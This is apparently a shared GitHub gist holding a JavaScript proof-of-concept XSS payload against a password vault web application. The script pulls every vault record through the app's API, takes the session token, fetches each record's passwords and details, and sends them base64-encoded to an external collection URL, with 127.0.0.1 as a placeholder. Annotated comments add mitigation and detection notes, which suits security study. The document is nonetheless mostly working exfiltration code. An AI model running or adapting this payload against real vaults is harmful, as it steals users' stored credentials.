Forked from shawarkhanethicalhacker/password_vault_exploit.js
Created
October 1, 2020 14:18
XSS Exploit code for retrieving passwords stored in a Password Vault
//Exploit Code by Shawar Khan
// Proof-of-concept XSS payload. It runs as page script on the vault's own
// origin, enumerates the vault's records through the vault API, fetches each
// record's secret fields with the victim's session, and sends the collected
// text to an external URL. The precondition is script injection on the vault
// origin; the API calls themselves are the application's ordinary endpoints.
//
// Defender notes:
//   - The two GET fetches below send no explicit credentials, so they
//     presumably ride on the victim's ambient browser session (cookies).
//     Same-origin requests carry cookies regardless of HttpOnly, and the POST
//     token is read from an API endpoint that page script can reach, so
//     neither flag nor token stops the payload once script runs here.
//   - Mitigation is upstream of this code: close the injection point, and set
//     a Content-Security-Policy whose connect-src does not allow the foreign
//     origin used by the final exfiltration fetch.
//   - Detection: one session issuing a POST to /api/v1/passwords/record for
//     every record id in quick succession, then an outbound request whose
//     "data" query parameter is base64.
var data_chunks = '';  // shared buffer: filled by the XHR callbacks, read by the timer at the end
// Capturing Records from API
// Response body is read as text first, then parsed in the next callback.
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {
  // Holds the records in as String
  var allrecords = data;
  // converting response to JSON
  // NOTE: no `var` here — `json_allrecords` becomes an implicit global (this
  // assignment would throw a ReferenceError in strict mode).
  json_allrecords = JSON.parse(allrecords)['records'];
  // holds record Ids
  var record_ids = new Array();
  // Object.entries() yields [key, value] pairs, so obj['1'] is the value. The
  // indexing assumes that value is an array whose first element carries an
  // `id` — the schema is inferred from this indexing only, not visible here.
  Object.entries(json_allrecords).forEach(function(obj) {
    record_ids.push((obj['1']['0']['id']));
  });
  // Capturing Session Token / Used to send POST requests
  // The token comes from an ordinary API endpoint readable by page script, so
  // it adds no protection against code already running on this origin.
  fetch('https://redacted.com/api/v1/session/token').then((resp) => resp.text()).then(function(data1) {
    // Holds Session Token
    var session_token = JSON.parse(data1)['session_token'];
    data_chunks = ""; // Will hold a complete record
    //Put loop for itterating through IDS
    // One asynchronous POST per record id. The onload handlers run later and
    // in whatever order responses arrive, each appending to `data_chunks`.
    record_ids.forEach(function(record_id) {
      // Looping through IDs and grabing Passwords
      var grab_password = new XMLHttpRequest();
      grab_password.open('POST', 'https://redacted.com/api/v1/passwords/record', true);
      grab_password.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
      grab_password.setRequestHeader("token", session_token);
      grab_password.onload = function () {
        // `this` is the XMLHttpRequest; both names below are implicit globals.
        response_password = this.responseText;
        parsed_passwords = JSON.parse(response_password);
        // Appending this record's fields to the buffer — nothing is sent from
        // here; the timer below does that. Indexing assumes `details` has at
        // least three entries; a shorter record makes this handler throw.
        data_chunks += parsed_passwords['record']['description']
        data_chunks += "\n"+parsed_passwords['record']['details']['0']['value']
        data_chunks += "\n"+parsed_passwords['record']['details']['1']['value']
        data_chunks += "\n"+parsed_passwords['record']['details']['2']['value']+"\n\n"
      };
      grab_password.send(JSON.stringify({id:record_id,is_organization:false}));
    });
    // Exfiltration step. After a fixed 2 s delay (not after the XHRs actually
    // complete) the whole buffer is base64-encoded into a query string and sent
    // to an attacker-controlled URL; 127.0.0.1 is a placeholder in this PoC.
    // Because the secrets travel in the URL, this request shows up in proxy and
    // web-server logs, and a CSP connect-src restriction blocks it outright.
    setTimeout(function(){ // Submitting Data Chunks to Attacker
      fetch('http://127.0.0.1/?data='+btoa(data_chunks))
    }, 2000);
  });
});